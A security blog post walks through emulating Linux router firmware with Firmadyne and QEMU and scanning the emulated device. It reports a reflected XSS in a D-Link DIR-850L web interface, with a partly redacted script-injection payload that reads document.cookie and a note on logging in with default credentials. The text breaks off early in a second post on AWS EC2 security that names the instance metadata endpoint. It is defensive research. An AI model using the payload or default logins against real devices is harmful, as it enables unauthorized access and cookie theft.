<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp5grN0IDcF3qiIKq7reuhU9KTAZ086fAqRRwmcKse76mo97oXZDkTVND8rXDBTVPQHJcmLGCq2_w8LgkvUbpx1yEl7DlQUkeCXkFlOuBQ202HRLx-nw-xva8KANU8q7sjq7gc0DGGWzZr/s1600/architecture.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="549" data-original-width="830" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp5grN0IDcF3qiIKq7reuhU9KTAZ086fAqRRwmcKse76mo97oXZDkTVND8rXDBTVPQHJcmLGCq2_w8LgkvUbpx1yEl7DlQUkeCXkFlOuBQ202HRLx-nw-xva8KANU8q7sjq7gc0DGGWzZr/s400/architecture.png" style="border: 1pt solid rgb(0, 0, 0);" width="400" /></a>Firmadyne is a tool which allows you to emulate, thanks to <a href="https://www.qemu.org/">QEMU</a>, a Linux-based firmware and perform basic dynamic analysis against it.<br />
<br />
<div style="text-align: justify;">
<div style="margin: 0px;">
As sentenced from its own <a href="https://github.com/firmadyne/firmadyne">github page</a>:<i>“FIRMADYNE is an automated and scalable system for performing emulation and dynamic analysis of Linux-based embedded firmware.”</i></div>
</div>
<br />
The aim of this software is to provide an automated way of testing a large number of firmwares with some test cases like <i>nmap</i> service discovery, <i>snmpwalk</i> or <i>metasploit.</i><br />
Currently it supports the emulation of three different CPUs architectures combinations:<br />
<ul>
<li>little-endian ARM</li>
<li>little-endian MIPS </li>
<li>big-endian MIPS</li>
</ul>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Below a step-by-step usage example of Firmadyne with the NetGear WN604 Router <a href="http://www.downloads.netgear.com/files/GDC/WN604/WN604%20Firmware%20Version%202.0.1.zip">Firmware</a> as test case is shown.<br />
<br /></div>
<div style="text-align: justify;">
The first step consists in the firmware extraction that Firmadyne accomplishes with the <i>extractor.py</i> script. This operation creates a zipped version of the firmware filesystem inside the <i>images</i> folder.</div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ <i>./sources/extractor/extractor.py -b netgear -sql 127.0.0.1 -np -nk "<b>WN604 Firmware Version 2.0.1.zip</b>" images</i></span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>> Database Image ID: 20</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>> MD5: f961fcc6d198940c2aaebb18b836f795</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>> Tag: 20</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>> Temp: /tmp/tmpZDScTD</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>> Status: Kernel: True, Rootfs: False, Do_Kernel: False, Do_Rootfs: True</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>>>> Zip archive data, at least v2.0 to extract, compressed size: 710, uncompressed size: 1351, name: ReleaseNotes_WN604_fw_2.0.1.html</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">>> Recursing into archive ...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[. . .]</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">/tmp/tmpSVfpkn/_WN604_V2.0.1_firmware.tar.extracted/rootfs.squashfs</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>> MD5: fb9c11e075a37a8a5c989743897e8735</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>> Tag: 20</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>> Temp: /tmp/tmpWfQ7yl</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>> Status: Kernel: True, Rootfs: False, Do_Kernel: False, Do_Rootfs: True</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>> Recursing into archive ...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>>>> Squashfs filesystem, big endian, lzma signature, version 3.1, size: 2333384 bytes, 650 inodes, blocksize: 131072 bytes, created: 2010-03-26 11:55:15</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>>>>> <b>Found Linux filesystem in /tmp/tmpWfQ7yl/_rootfs.squashfs.extracted/squashfs-root!</b></span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
The second step is identifying the device architecture and store the result into the database (note that the number 20 is the image ID given by Firmadyne to this firmware).</div>
</div>
<div>
<br /></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ <i>./scripts/getArch.sh ./images/20.tar.gz</i> </span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">./bin/busybox: <b>mipseb</b></span></div>
<div>
<br /></div>
<div>
The third step is loading the content of the filesystem into the database and then create a <i>QEMU</i> disk image with the <i>makeImage.sh</i> script.</div>
<div>
<br /></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ <i>./scripts/tar2db.py -i 20 -f ./images/20.tar.gz</i> </span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ <i>sudo ./scripts/makeImage.sh 20</i></span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Querying database for architecture... Password for user firmadyne: </span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>mipseb</b></span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">----Running----</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">----Copying Filesystem Tarball----</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">----Creating QEMU Image----</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Formatting '/home/lcomi/work/clients/minded/firmadyne//scratch//20//image.raw', fmt=raw size=1073741824</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">----Creating Partition Table----</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Welcome to fdisk (util-linux 2.31.1).</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Changes will remain in memory only, until you decide to write them.</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[. . .]</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
Once the image is ready it is time to infer firmware network configuration.</div>
</div>
<div>
<br /></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ sudo ./scripts/inferNetwork.sh 20</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Querying database for architecture... Password for user firmadyne: </span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">mipseb</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Running firmware 20: terminating after 120 secs...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">qemu-system-mips: -net nic,vlan=0: 'vlan' is deprecated. Please use 'netdev' instead.</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Bad SWSTYLE=0x04</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">qemu-system-mips: terminating on signal 2 from pid 19371 (timeout)</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Inferring network...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Interfaces: [(<b>'brtrunk', '192.168.0.100'</b>)]</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Done!</span></div>
<div>
<br />
<div style="text-align: justify;">
<b>Note</b>: if <i>infernetwork.sh</i> cannot identify any interfaces for the aforementioned firmware, it may be necessary to fix Firmadyne script as described by <a href="https://github.com/firmadyne/firmadyne/issues/89">this issue</a>.<br />
<br /></div>
<div style="text-align: justify;">
In the end it is possible to launch the firmware emulation with the <i style="font-family: "times new roman";">run.sh</i> script.</div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ sudo ./scratch/20/run.sh</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Creating TAP device tap20_0...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Set 'tap20_0' persistent and owned by uid 0</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Bringing up TAP device...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Adding route to 192.168.0.100...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Starting firmware emulation... use Ctrl-a + x to exit</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">qemu-system-mips: -net nic,vlan=0: 'vlan' is deprecated. Please use 'netdev' instead.</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] Linux version 2.6.32.70 (vagrant@vagrant-ubuntu-trusty-64) (gcc version 5.3.0 (GCC) ) #1 Thu Feb 18 01:39:21 UTC 2016</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] </span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] LINUX started...</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] bootconsole [early0] enabled</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] CPU revision is: 00019300 (MIPS 24Kc)</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] FPU revision is: 00739300</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] Determined physical RAM map:</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] memory: 00001000 @ 00000000 (reserved)</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] memory: 000ef000 @ 00001000 (ROM data)</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] memory: 0061e000 @ 000f0000 (reserved)</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] memory: 0f8f1000 @ 0070e000 (usable)</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] debug: ignoring loglevel setting.</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[. . .]</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
As can be seen from the nmap output and from the following picture, all the device services are available over the network at IP address 192.168.0.100 and they can be analyzed by using the scripts included in Firmadyne <span style="font-family: "times" , "times new roman" , serif;"><i>analysis</i></span> folder.</div>
</div>
<div>
<br />
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ nmap -p- -sV -T4 192.168.0.100</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-19 17:12 CEST</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Nmap scan report for 192.168.0.100</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Host is up (0.00070s latency).</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Not shown: 65532 closed ports</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">PORT STATE SERVICE VERSION</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>22/tcp open ssh Dropbear sshd 0.51 (protocol 2.0)</b></span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>80/tcp open http lighttpd 1.4.18</b></span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>443/tcp open ssl OpenSSL (SSLv3)</b></span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></div>
<div>
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikttT9NZzJZ-6f1KiKJeUmPRxcR7rfmrY5GzDfsrj0Sbh9nPxcSNr5mIShtoooXcWev32AkcmZX_S0D2NNBo8xG3QFmlGaxZVucwfgLHWTsAbwieJ7QXdPxQr-1vX0MmyKjCn0oYj4odMk/s1600/Selection_001.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="452" data-original-width="1429" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikttT9NZzJZ-6f1KiKJeUmPRxcR7rfmrY5GzDfsrj0Sbh9nPxcSNr5mIShtoooXcWev32AkcmZX_S0D2NNBo8xG3QFmlGaxZVucwfgLHWTsAbwieJ7QXdPxQr-1vX0MmyKjCn0oYj4odMk/s640/Selection_001.png" style="border: 1pt solid rgb(0, 0, 0);" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div style="font-size: medium; text-align: start;">
<div style="text-align: center;">
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;">Device web interface is listening on port 80. </td></tr>
</tbody></table>
<span id="docs-internal-guid-143b8954-7fff-576e-3b2f-c5e69e44e9e0"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
</div>
<div style="font-size: medium; text-align: start;">
</div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<br />
Being a pentester who wants to manually conduct his own dynamic analysis and without being interested in the "statistic" capabilities of Firmadyne, it would be useful to employ this tool only to extract and emulate a device firmware. Considering this approach, it was created a simple but effective script called <i style="text-align: justify;">firmadyne-launcher </i>to <b>easily automate the emulation of a firmware</b>.<br />
<br />
<div style="text-align: justify;">
After having installed and configured Firmadyne, it is possible to clone <i>firmadyne-launcher</i> <a href="https://github.com/mindedsecurity/firmadyne-launcher">repository</a> on your local machine and move <i>firmadyne_laucher.sh</i> inside Firmadyne application folder. Now, providing a firmware file as argument, the script can be started.</div>
<br />
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">lcomi@aquarius:~/firmadyne$ ./firmadyne_launcher.sh firmware.zip</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Extracting the firmware...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Getting the architecture...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Creating the image...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Creating TAP device tap7_0...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Set 'tap7_0' persistent and owned by uid 0</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Bringing up TAP device...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Adding route to 192.168.0.100...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Starting firmware emulation... use Ctrl-a + x to exit</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">qemu-system-mips: -net nic,vlan=0: 'vlan' is deprecated. Please use 'netdev' instead.</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] Linux version 2.6.32.70 (vagrant@vagrant-ubuntu-trusty-64) (gcc version 5.3.0 (GCC) ) #1 Thu Feb 18 01:39:21 UTC 2016</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] </span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] LINUX started...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] bootconsole [early0] enabled</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] CPU revision is: 00019300 (MIPS 24Kc)</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] FPU revision is: 00739300</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] Determined physical RAM map:</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] memory: 00001000 @ 00000000 (reserved)</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] memory: 000ef000 @ 00001000 (ROM data)</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ . . . ]</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Welcome to SDK.</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Have a lot of fun...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"></span>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">netgear123456 login: </span></div>
<div>
<br />
<h3>
Looking for web vulnerabilities</h3>
<div style="text-align: justify;">
To prove that it is possible to dynamically test an emulated device like a physical one, some interesting web vulnerabilities could be hunted. Below it is given an example about the findings of a new reflected XSS inside the web interface of the Dlink 850L router. The vulnerable firmware can be found <a href="http://files.dlink.com.au/products/DIR-850L/REV_A/Firmware/Firmware_v1.14B07B01/DIR850LA1_FW114WWb07b01.bin">here</a>.</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVHaX6_GO8sZxZ33fRKlLgsh4GHel0bmWcMbtsZPDpwF-IiNkS52HaqD-LVQszpNOqJb1UPLCIy99QhVuj5J87os1GLtzK4IvjAeQPksMIQBYemEWeX0V3hrwi1UK74h6RkKWL1cuEqExQ/s1600/Selection_000xss.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="573" data-original-width="1600" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVHaX6_GO8sZxZ33fRKlLgsh4GHel0bmWcMbtsZPDpwF-IiNkS52HaqD-LVQszpNOqJb1UPLCIy99QhVuj5J87os1GLtzK4IvjAeQPksMIQBYemEWeX0V3hrwi1UK74h6RkKWL1cuEqExQ/s640/Selection_000xss.png" style="border: 1pt solid rgb(0, 0, 0);" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Router login page, the default password is empty.</td></tr>
</tbody></table>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<div style="text-align: justify;">
After the login page, that can be simply bypassed using the default <a href="https://www.lifewire.com/d-link-default-password-list-2619152">credentials</a>, it is possible to see different menu and configuration options which a user can modify. After mapping some of them with the help of a proxy like Burp, it was noticed that a particular handler had a vulnerable parameter that led us to trigger an XSS through the following tampered GET request:<br />
<blockquote class="tr_bq">
http://192.168.0.1/[HANDLER]?[PARAM]=</script><script>alert(document.cookie)</script></blockquote>
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKTA9nr3vaPQ3QD40bxaqNRddReMRZzJy4Z22Kl7t3zPGLwu6tWYDqimseLoJXg3VzXfpowOuhxTA7fWwA6Zix3csg7EpQ9HdWzWBkeaBBO-uUcOjZ4wAOtHhggt2bfngz6bEWcV24dCOC/s1600/Selection_002xss.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="321" data-original-width="1600" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKTA9nr3vaPQ3QD40bxaqNRddReMRZzJy4Z22Kl7t3zPGLwu6tWYDqimseLoJXg3VzXfpowOuhxTA7fWwA6Zix3csg7EpQ9HdWzWBkeaBBO-uUcOjZ4wAOtHhggt2bfngz6bEWcV24dCOC/s640/Selection_002xss.png" style="border: 1pt solid rgb(0, 0, 0);" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;">Execution of the arbitrary JS code inside the victim's browser. </td></tr>
</tbody></table>
</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br />
The details of this vulnerability, addressed as CVE-2018-17779, are actually redacted to allow Dlink to patch any vulnerable firmwares.<br />
<br />
It is suggested to download the aforementioned D-Link firmware and try to find out many other vulnerabilities. Another great exercise is to manually extract the device filesystem (following <a href="https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html">the first part</a> of this guide) and localize any dynamic analysis findings (like the xss-vulnerable web page) inside the source code and then find a solution to fix them.</div>
<div style="text-align: justify;">
<br /></div>
<h3>
Conclusions</h3>
<div style="text-align: justify;">
In this article it was shown how it is possible to emulate a firmware device and what are its main advantages and limitations. Thanks to this technique, a new vulnerability inside Dlink DIR-850L web interface was found, even without having the physical device.<br />
<br />
This post closes our IoT pentesting serie, where both static and dynamic approach in firmwares security review have been discussed. It is important to underline that IoT manufacturers have to consider the security of their products as a top priority and researchers should have the possibility to freely test devices to find out new vulnerabilities and responsibly disclose them.</div>
<br />
<div>
<h3>
References</h3>
</div>
<div>
<ul>
<li>https://github.com/firmadyne/firmadyne/blob/master/paper/paper.pdf</li>
<li>https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html</li>
</ul>
</div>
<div>
<br /></div>
</div>
</div>
Lorenzo Comihttp://www.blogger.com/profile/08777059741084155036noreply@blogger.com2tag:blogger.com,1999:blog-7122745763234660283.post-46014923747967263662018-09-18T08:55:00.000-07:002018-09-28T03:45:30.885-07:00A practical guide to testing the security of Amazon Web Services (Part 2: AWS EC2)This is Part 2 of 3 on our practical guide to testing the security of Amazon Web Services. We are tackling the main services provided by Amazon for its cloud-based platform to support web applications and we started by discussing AWS S3 buckets and their security. You can get a little overview of AWS and catch up on important aspects of testing AWS S3 by reading our <a href="http://blog.mindedsecurity.com/2018/09/a-practical-guide-to-testing-security.html" target="_blank">previous post</a>.<br />
<br />
In this second part, we describe another important AWS service used on a daily basis by many users: Elastic Compute Cloud or, more commonly, EC2.<br />
<h2>
AWS EC2</h2>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz1BY_O6Ho3W_3OEWotXZjtF4th_5Hnzq1M6rTAjfs8L35vDaNy4Kuh12gFq7HaIWJwUpRFNqORvpHsSD-qvm6hyp8PItoVsCIxd3dB-J2E82HBq7Z0TV1MAQ5pUYgaTu4tFAUf-t0VuvX/s1600/Compute_AmazonEC2.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="400" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz1BY_O6Ho3W_3OEWotXZjtF4th_5Hnzq1M6rTAjfs8L35vDaNy4Kuh12gFq7HaIWJwUpRFNqORvpHsSD-qvm6hyp8PItoVsCIxd3dB-J2E82HBq7Z0TV1MAQ5pUYgaTu4tFAUf-t0VuvX/s200/Compute_AmazonEC2.png" /></a>Elastic Compute Cloud (EC2) is another widely used service offered by Amazon. It allows to rent virtual computers that can be used to run arbitrary applications. AWS EC2 provides a scalable solution to deploy a new computer, which in AWS terminology is called an "instance", and mange its status via a web-based user interface. The user can manage every aspect of an EC2 instance from the creation and execution to the definition of access policies. It's undeniable that AWS EC2 constitutes a powerful tool that, if not properly configured and protected, will inevitably result in a security breach. AWS EC2 instances provide many different features. In this post we discuss two features that are particular relevant when from a security perspective: Elastic Block Store and Instance Metadata Service.<br />
<br />
AWS EC2 instances can benefit from other AWS services to which they are granted access to. A typical example, that we first introduced in Part 1 and we further explore here, is the synergy between AWS EC2 instances and AWS S3 buckets. When an AWS EC2 instance is created it requires, as all computers do, a persistent storage unit where you can save your data. Amazon thus provides Elastic Block Store (EBS) which is a block-level storage that provides a persistent storage solution that can be attached to an AWS EC2 instance. An EBS block thus constitutes an important part of an AWS EC2 instance as it allows to store data processed by the instance itself. Given its importance, it might be convenient to be able to take snapshots of an EBS block and store it safely so that, in the case of a failure, the AWS EC2 instance can be restored to a safe status. To accomplish this, Amazon gives the possibility of taking EBS snapshots and store them in its storage service AWS S3.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7DdxiUXZWys249WDN7byDwIlJWPlTNqcem4i5Uzxm4J0Io4ZaQAYCtTcXb1mYho9lLVcpd_OjuU2L_oVtK68QOhT6Ln8n49KFUXGejOO6D1f1vFyfS9RrGE31s4GHURy-tGcYgV9_5icE/s1600/Disegno+senza+titolo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="355" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7DdxiUXZWys249WDN7byDwIlJWPlTNqcem4i5Uzxm4J0Io4ZaQAYCtTcXb1mYho9lLVcpd_OjuU2L_oVtK68QOhT6Ln8n49KFUXGejOO6D1f1vFyfS9RrGE31s4GHURy-tGcYgV9_5icE/s400/Disegno+senza+titolo.png" /></a></div>
<br />
<br />
Let's now discuss another interesting feature that AWS EC2 instances have access to called Instance Metadata Service (IMS). IMS allows any AWS EC2 instance to retrieve data about the instance itself that can be used to configure or managing the running instance. The data available from the IMS ranges from the hostname of the instance to the initialization scrip that is executed upon running the instance. All this information can be retrieved only by the AWS EC2 instance by querying a specific API end-point located at <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">http://169.254.169.254</span>.<br />
As will become clear in the remaining of this post, this end-point provides valuable information an attacker might use to compromise not only the AWS EC2 instance but other services as well. The documentation for the IMS, in fact, states the following:<br />
<blockquote class="tr_bq">
Although you can only access instance metadata and user data from within the instance itself, the data is not protected by cryptographic methods. Anyone who can access the instance can view its metadata. Therefore, you should take suitable precautions to protect sensitive data (such as long-lived encryption keys). You should not store sensitive data, such as passwords, as user data.</blockquote>
IMS becomes thus a crucial aspects when analyzing the security of AWS EC2 instances.<br />
<h3>
Publicly accessible EC2 snapshots</h3>
